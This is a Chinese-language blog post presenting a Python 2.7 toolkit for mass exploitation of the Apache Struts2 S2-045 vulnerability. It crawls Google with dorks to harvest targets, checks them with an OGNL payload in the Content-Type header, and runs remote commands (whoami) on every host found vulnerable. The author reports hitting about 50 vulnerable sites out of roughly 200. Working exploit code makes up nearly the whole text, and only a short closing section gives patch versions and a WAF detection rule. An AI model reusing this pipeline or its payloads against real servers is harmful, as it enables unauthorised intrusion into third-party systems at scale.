前言
S2-045远程代码执行漏洞的CNVD详细信息:http://www.cnvd.org.cn/flaw/show/CNVD-2017-02474漏洞刚出现时候,Google随便搜索相关URL(filetype:action||ext:action),利用后发现有很多甚者使用ROOT用户启动Tomcat,啧啧啧。。。
目前,很多公司已经紧锣密鼓地修复了漏洞,尽管如此,互联网上仍有大批尚未修复的系统……可能是觉得无所谓吧。
批量S2-045用python 2.7实现,代码共分三部分,比较糙,多指正。
第一部分:从Google批量抓取目标URL;
第二部分:验证筛选存在漏洞的URL;
第三部分:远程命令执行
一、Google抓取URL
目标URL抓取,可能会被Google限制抓取次数,若有IP资源,可以不断更换代理、多线程抓取。
—keywords文件—–>抓取关键词,例如:filetype:action、ext:action
—urser-agent文件—–>随机ua抓取
—urlresult文件—–>存储抓取的url
#!/usr/bin/python # -*- coding: utf-8 -*- # Create by Meibenjin. # Modified by William # Last updated: 2017-03-10 # google search results crawler import sys import urllib2, socket, time import gzip, StringIO import re, random, types from bs4 import BeautifulSoup base_url = 'https://www.google.com.hk/' results_per_page = 10 user_agents = list() # results from the search engine class SearchResult: def __init__(self): self.url = '' def getURL(self): return self.url def setURL(self, url): self.url = url def printIt(self, prefix=''): print 'url\t->', self.url def writeFile(self, filename): file = open(filename, 'a') try: file.write(self.url + '\n') except IOError, e: print 'file error:', e finally: file.close() class GoogleAPI: def __init__(self): timeout = 40 socket.setdefaulttimeout(timeout) def randomSleep(self): sleeptime = random.randint(60, 120) time.sleep(sleeptime) # extract a url from a link def extractUrl(self, href): url = '' pattern = re.compile(r'(http[s]?://[^&]+)&', re.U | re.M) url_match = pattern.search(href) if (url_match and url_match.lastindex > 0): url = url_match.group(1) return url # extract serach results list from downloaded html file def extractSearchResults(self, html): results = list() soup = BeautifulSoup(html, "html.parser") div = soup.find('div', id='search') if (type(div) != types.NoneType): #modify 'li' to 'div' lis = div.findAll('div', {'class': 'g'}) if (len(lis) > 0): for li in lis: result = SearchResult() h3 = li.find('h3', {'class': 'r'}) if (type(h3) == types.NoneType): continue # extract url from h3 object link = h3.find('a') if (type(link) == types.NoneType): continue url = link['href'] url = self.extractUrl(url) if (cmp(url, '') == 0): continue result.setURL(url) results.append(result) return results # search web # @param query -> query key words # @param lang -> language of search results # @param num -> number of search results to return def search(self, query, lang='en', num=results_per_page): search_results = list() query = 
urllib2.quote(query) if (num % results_per_page == 0): pages = num / results_per_page else: pages = num / results_per_page + 1 for p in range(0, pages): start = p * results_per_page url = '%s/search?hl=%s&num=%d&start=%s&q=%s' % (base_url, lang, results_per_page, start, query) retry = 3 while (retry > 0): try: request = urllib2.Request(url) length = len(user_agents) index = random.randint(0, length - 1) user_agent = user_agents[index] request.add_header('User-agent', user_agent) request.add_header('connection', 'keep-alive') request.add_header('Accept-Encoding', 'gzip') request.add_header('referer', base_url) response = urllib2.urlopen(request) html = response.read() if (response.headers.get('content-encoding', None) == 'gzip'): html = gzip.GzipFile(fileobj=StringIO.StringIO(html)).read() results = self.extractSearchResults(html) search_results.extend(results) break; except urllib2.URLError, e: print 'url error:', e self.randomSleep() retry = retry - 1 continue except Exception, e: print 'error:', e retry = retry - 1 self.randomSleep() continue return search_results def load_user_agent(): fp = open('./user_agents', 'r') line = fp.readline().strip('\n') while (line): user_agents.append(line) line = fp.readline().strip('\n') fp.close() def crawler(): # Load use agent string from file load_user_agent() # Create a GoogleAPI instance api = GoogleAPI() # set expect search results to be crawled expect_num = 100 # if no parameters, read query keywords from file if (len(sys.argv) < 2): keywords = open('./keywords', 'r') keyword = keywords.readline() while (keyword): results = api.search(keyword, num=expect_num) for r in results: r.printIt() r.writeFile('urlresult') keyword = keywords.readline() keywords.close() else: keyword = sys.argv[1] results = api.search(keyword, num=expect_num) for r in results: r.printIt() r.writeFile('urlresult') if __name__ == '__main__': crawler() |
二、POC漏洞验证
验证是否有s2-045漏洞
—urlresult文件—–>已存储的抓取的url
—detectreslut文件—–>存储验证成功的url
# -*- coding: utf-8 -*- import urllib2 S2_045 = {"poc": "%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('fuck')).(#o.close())}", "key": "fuck"} def poccheck(timeout): urls = open('../GoogleSearch/urlresult', 'r') detectresults = open('./detectresult', 'w') for url in urls.readlines(): url = url.strip('\n') url = url.split('%3F', 1)[0] request = urllib2.Request(url) request.add_header("Content-Type", S2_045["poc"]) request.add_header("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0") try: res_html = urllib2.urlopen(request, timeout=timeout).read(204800) except Exception,e: print 'exception:'+url if S2_045['key'] in res_html: print S2_045['key']+':'+url detectresults.write(url+'\n') urls.close() detectresults.close() if __name__ == "__main__": print poccheck(10) |
三、远程命令执行
在已发现的具有漏洞的URL基础上,执行远程命令。
代码中执行whoami,有的已验证漏洞URL,远程命令执行会捕获异常或返回html页面,猜测目标的Struts2并未修复,只是在应用层的检测和响应环节做了防御。
—detectreslut文件—–>已存储的验证成功的url
—exploitresult文件—–>存储whoami执行结果
# -*- coding: utf-8 -*- import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers def exploit(): urls = open('../S2045Detection/detectresult', 'r') exploitresults = open('./exploitresult', 'w') for url in urls.readlines(): url = url.strip('\n') register_openers() datagen, header = multipart_encode({"image1": url}) header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header["Content-Type"]="%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+'whoami'+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" request = urllib2.Request(url,datagen,headers=header) try: response = urllib2.urlopen(request, timeout=10) result = response.read(204800) except Exception, e: print 'exception:'+url else: if len(result) > 100: print 'html:'+url else: print result.strip('\n')+':'+ url exploitresults.write(result) urls.close() exploitresults.close() if __name__ == "__main__": exploit() |
结果:
抓取不到300个URL就被Google返回503状态码,可以考虑付费API、更换代理、多进程进一步改进效率。
小范围统计,约200个目标URL,返回50个具有漏洞的URL。
远程命令执行,部分成功结果如下图所示。
关于防护:
除了将Struts2框架升级到已修复的版本(2.3.32或2.5.10.1及以上)外,可以考虑暂时设置WAF规则拦截攻击行为。
附:Imperva WAF拦截规则
Signature Pattern: part="Content-Type", part="multipart/form-data", part="_memberAccess", rgxp="^Content-Type\s*:[^\x0A\x0D]*multipart\/form-data[^\x0A\x0D]*_memberAccess"
Protocols: http, https
Search Signature In: Headers